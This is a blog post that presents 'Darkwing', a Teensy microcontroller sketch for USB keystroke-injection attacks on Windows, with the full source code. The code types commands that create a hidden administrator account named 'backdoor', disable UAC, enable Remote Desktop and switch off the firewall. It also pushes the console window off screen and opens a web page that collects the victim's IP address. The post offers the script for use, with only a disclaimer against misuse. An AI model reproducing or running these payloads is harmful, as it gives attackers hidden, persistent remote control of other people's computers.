The Unstoppable Windows Hacking Device
by Hans Kokx on Aug.16, 2010, under Security, Visitor Favorite, Windows
Next in a long run of Windows hacks, we have a device that can not be blocked easily via software, and is fully customizable. The Teensy 2.0 (purchased for $18 at www.pjrc.com) is an Arduino-like microcontroller that can be programmed to act as a keyboard once plugged in. The device and vendor IDs can be changed at will, making it extremely difficult to block it as a single device. (I, myself, have mine identifying as an Apple Pro Keyboard - as it requires no drivers in Linux, Mac OS X, or Windows - and doesn't queue off OS X to identify an unknown keyboard.) There is an application out there that takes inventory of your USB devices and monitors for, and blocks, new devices - but unless you have this highly obscure program running, you are likely to to fall victim to this device.
Once properly programmed (using either C++, or the Arduino IDE), the Teensy can spew text as a normal keyboard would - but it can do it at rates much higher than anyone can accurately type. Entire batch scripts, full sets of commands, and anything else you can think of (including mouse movements) can be programmed in. Using this method, you can open a back door right in to any Windows machine (or Mac or Linux box - although they are somewhat more difficult, due to the inherent security mechanisms built in... we'll take a look at those at a later date. They require a bit of social engineering.)
The following is a script I've put together called Darkwing. (Named after the duck, of course, and because, until recently, my Teensy has been housed inside of a rubber duck squeaky toy as first designed by Hak5's Darren Kitchen.)
// Darkwing v0.1 // USB Ducky Framework for the Teensy 2.0 // by HaDAk // for the Hak.5 Community -- please contribute, distribute, and credit! // Variables int blinkcount = 0; // OS X payloads char* osx_ips = "ifconfig"; // *nix payloads char* nix_ips = "ifconfig"; // Windows Payloads // Add user "backdoor" with password "p@$$w0rd", // add to the local admin group, and hide from the login screen char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD"; // Disable UAC char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f"; // Enable Remote Desktop char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"; // Disable Windows Firewall char* win_disablefirewall = "netsh firewall set opmode disable"; // Launch their browser to your favorite website -- I use this to collect their IP and other system metrics char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky"; void setup() { // Blink when the ducky is first plugged in, to verify power to it. while(blinkcount < 2){ blink(50); blinkcount++; } // Windows generally needs a longer delay to enumerate the device. 3000ms is // typically sufficient, depending on the speed of the machine. Additionally, // the first time the device is plugged it, Windows will need a while to // install drivers. To avoid a really high delay, I recommend unplugging the // Ducky, letting Windows install the drivers, then replugging it. // The value will probably vary by machine, so experiment to find what works. delay(3000); blink(50); RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\""); // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505 //RunGnomeKDECommand("xterm"); // Linux (Gnome/KDE) command line example //RunOSXCommand("Terminal.app"); // OS X Command line example delay(500); // Move window off screen win_MoveWindow(); // Administer payload(s) Keyboard.print(win_disableuac); enter(); Keyboard.print(win_adduser); enter(); Keyboard.print(win_enablerdp); enter(); Keyboard.print(win_disablefirewall); enter(); Keyboard.print(win_launchwebsite); enter(); Keyboard.print("exit"); enter(); } void loop() { blink(400); } void blink(int time){ pinMode( PIN_D6, OUTPUT ); // set LED to super bright digitalWrite(PIN_D6, HIGH); // LED on delay(time); // Slow blink digitalWrite(PIN_D6, LOW); // LED off delay(time); } void enter(){ // Press the enter key, and release it Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void RunGnomeKDECommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_F2); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); Keyboard.print(cmd); enter(); } void RunOSXCommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); Keyboard.print(cmd); delay(500); enter(); } void RunWindowsCommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); Keyboard.print(cmd); enter(); } void RunWinUACCommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(50); Keyboard.print(cmd); Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT); Keyboard.send_now(); enter(); Keyboard.set_modifier(0); Keyboard.send_now(); delay(500); Keyboard.set_modifier(KEY_RIGHT); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); enter(); } void win_MoveWindow(){ int move = 0; Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.print("m"); while(move < 250){ Keyboard.set_key1(KEY_DOWN); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); move++; } enter(); }
Darkwing contains several functions to make your life much easier when writing scripts. There are included functions for things such as opening a UAC command line in Windows Vista and 7, moving a window to the bottom of the screen, so it's out of sight, and running applications in Windows, Mac OS X, and Linux (Gnome and KDE - or whatever else uses the Alt+F2 launcher).
The payloads included with Darkwing will add an administrative user to Windows, hide it from the login screen, disable the firewall, disable UAC, and enable remote desktop. A future revision of this script will reside in a Windows script with several executables, but that's a post for another day.
For now, I am releasing the current incarnation of my script into the wild with the same disclaimer as always: this hack is meant to raise awareness of the inherent insecurities of computer systems, particularly Windows, and ideally to nudge Microsoft into creating a more secure computing environment. Please do NOT use this script or any information here for illegal purposes, as I am NOT responsible for your actions.
